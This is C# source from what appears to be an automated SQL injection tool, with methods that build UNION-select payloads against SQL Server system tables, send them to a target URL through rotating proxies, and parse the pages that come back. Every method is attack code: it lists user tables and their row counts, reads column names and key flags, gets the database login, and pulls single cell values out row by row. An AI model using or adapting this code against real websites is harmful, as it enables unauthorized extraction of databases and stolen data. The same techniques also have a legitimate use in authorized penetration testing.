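/// <summary>
/// Pull the name, SQL type and primary-key flag of the first column of table
/// <paramref name="TableID"/> whose colid is greater than <paramref name="FieldID"/>.
/// Two injected union-select requests are made: one against syscolumns for the
/// "name:xtype" pair, one against sysconstraints for the constraint status.
/// </summary>
/// <param name="TableID">sysobjects.id of the table being enumerated</param>
/// <param name="FieldID">colid the search starts after (presumably the previously
/// retrieved column, 0 on the first call — verify against the caller)</param>
/// <returns>The retrieved column; IsPrimary keeps its default when sysconstraints
/// returned nothing for the requested colid</returns>
/// <exception cref="FormatException">The syscolumns response did not hold a
/// "name:xtype" pair, or a numeric field could not be parsed</exception>
private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
    GlobalDS.Field retVal = new GlobalDS.Field();

    // syscolumns: "name:xtype" for the next column after FieldID. Both ids are numeric
    // parameters, so appending them cannot change the shape of the injected statement.
    StringBuilder WhereClause = new StringBuilder();
    WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

    string[] values = PulledData.Split(':');
    if (values.Length < 2)
    {
        // The marker was not found in the page; report it instead of indexing past the array.
        throw new FormatException("Unexpected syscolumns response: " + PulledData);
    }
    retVal.FieldName = values[0];
    retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));

    // sysconstraints: ":status" for the constraint on this column (varchar, because the
    // expression is built from convert(char, ...) — hence the varchar parser).
    // NOTE(review): this looks up colid = FieldID, whereas the column fetched above is the
    // one with colid > FieldID; confirm the caller's contract before trusting IsPrimary.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (PulledData.Length > 0)
    {
        // Drop the leading ':' marker.
        int status = Convert.ToInt32(PulledData.Substring(1).Trim());
        // sysconstraints.status is a pseudo-bit-mask: the low nibble is a type code
        // (1 = PRIMARY KEY, 2 = UNIQUE, 3 = FOREIGN KEY, 4 = CHECK, 5 = DEFAULT) and
        // 16/32 flag column-/table-level. Testing only bit 0 would also accept FOREIGN KEY (3)
        // and DEFAULT (5), so compare the whole type nibble.
        retVal.IsPrimary = ((status & 0xF) == 1);
    }
    return(retVal);
}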
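/// <summary>
/// Pull the name, object id and row count of the first user table (sysobjects.xtype = 'U',
/// i.e. char(85)) whose id is greater than <paramref name="PreviousTableID"/>.
/// </summary>
/// <param name="PreviousTableID">sysobjects.id of the last table retrieved (presumably 0 on
/// the first call — verify against the caller)</param>
/// <returns>The table; RecordCount is -1 when the count(*) request yielded nothing</returns>
/// <exception cref="FormatException">The sysobjects response did not hold a "name:id"
/// pair, or a numeric field could not be parsed</exception>
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
    GlobalDS.Table retVal = new GlobalDS.Table();

    // "name:id" from sysobjects. The text is wrapped in convert(int, ...); presumably the
    // resulting conversion error is what surfaces the value — confirm against ParsePage.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

    string[] values = ResultText.Split(':');
    if (values.Length < 2)
    {
        // The marker was not found in the page; report it instead of indexing past the array.
        throw new FormatException("Unexpected sysobjects response: " + ResultText);
    }
    retVal.Name = values[0];
    retVal.ObjectID = Convert.ToInt64(values[1].Trim());

    // count(*) against the table just found. Its name goes into the FROM clause verbatim.
    // NOTE(review): names that need [bracket] quoting are not handled here — confirm whether
    // GeneralPurposeUnionTextSelect quotes its table argument.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
    ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    if (ResultText.Length > 0)
    {
        // Drop the leading ':' marker before parsing the count.
        retVal.RecordCount = Convert.ToInt64(ResultText.Substring(1).Trim());
    }
    else
    {
        // No usable response: -1 tells the caller the count is unknown.
        retVal.RecordCount = -1;
    }
    return(retVal);
}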
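/// <summary>
/// Pull the login the database session is running as (SYSTEM_USER). The injected
/// expression wraps it in parentheses so it can be located in the returned page.
/// </summary>
/// <returns>The login name with the surrounding parentheses removed, or an empty string
/// when the response was too short to have contained the "(...)" marker</returns>
public string GetDatabaseUsername()
{
    // char(40)/char(41) are '(' and ')': the markers are produced server-side so the
    // payload needs no string delimiters.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(40) + SYSTEM_USER + char(41)", null, null);
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string Username = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

    // Anything shorter than "()" cannot hold the marker; previously Substring threw
    // ArgumentOutOfRangeException on such a response.
    if (string.IsNullOrEmpty(Username) || Username.Length < 2)
    {
        return string.Empty;
    }
    return(Username.Substring(1, Username.Length - 2)); // remove the parentheses
}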
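// }}}
// {{{ GetFieldData
/// <summary>
/// Pull one column value of the row whose primary key equals <paramref name="pk"/>.
/// The value is selected as ":value:" so it can be located in the page; the markers are
/// stripped before returning.
/// </summary>
/// <param name="TableName">Table the row lives in (placed in the FROM clause verbatim)</param>
/// <param name="Column">Column to read; its FieldName and DataType drive the request</param>
/// <param name="pk">Primary-key column name and the value identifying the row</param>
/// <returns>Key = the column name; Value = the cell text, the pk value itself when the
/// column is the key column, or an empty string for unsupported types and empty responses</returns>
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
    DictionaryEntry retVal = new DictionaryEntry();
    retVal.Key = Column.FieldName;
    retVal.Value = string.Empty;

    // The key column needs no request: the caller already knows its value.
    if (Column.FieldName.Equals(pk.Name))
    {
        retVal.Value = pk.Value;
        return(retVal);
    }

    string SelectClause;
    switch (Column.DataType)
    {
        // Numeric, date, character and bit types all read through the same nvarchar
        // conversion, bracketed by char(58) (':') markers.
        case SqlDbType.BigInt:
        case SqlDbType.SmallInt:
        case SqlDbType.TinyInt:
        case SqlDbType.Int:
        case SqlDbType.Decimal:
        case SqlDbType.DateTime:
        case SqlDbType.Money:
        case SqlDbType.Float:
        case SqlDbType.Real:
        case SqlDbType.SmallDateTime:
        case SqlDbType.SmallMoney:
        case SqlDbType.Timestamp:
        case SqlDbType.UniqueIdentifier:
        case SqlDbType.NChar:
        case SqlDbType.Char:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
        case SqlDbType.NText:
        case SqlDbType.VarChar:
        case SqlDbType.Bit:
            SelectClause = "char(58) + convert(nvarchar, " + Column.FieldName + ") + char(58)";
            break;
        case SqlDbType.Image:
        case SqlDbType.Binary:
        case SqlDbType.VarBinary:
        default:
            // TODO: Figure out how to support this!
            // Binary types (and any type not listed above) have no select expression.
            // Previously an empty clause was still sent to the target, which could only
            // produce a malformed query and then an out-of-range Substring below.
            return(retVal);
    }

    // NOTE(review): pk.Value is interpolated without quoting, so a string-typed key would
    // need quoting supplied by whoever builds the PrimaryKey — confirm against the caller.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause, TableName, pk.Name + " = " + pk.Value);
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

    // Strip the ':' markers; a response shorter than "::" means the value was not found and
    // the empty default set above is returned.
    if (ResultText.Length >= 2)
    {
        retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
    }
    return(retVal);
}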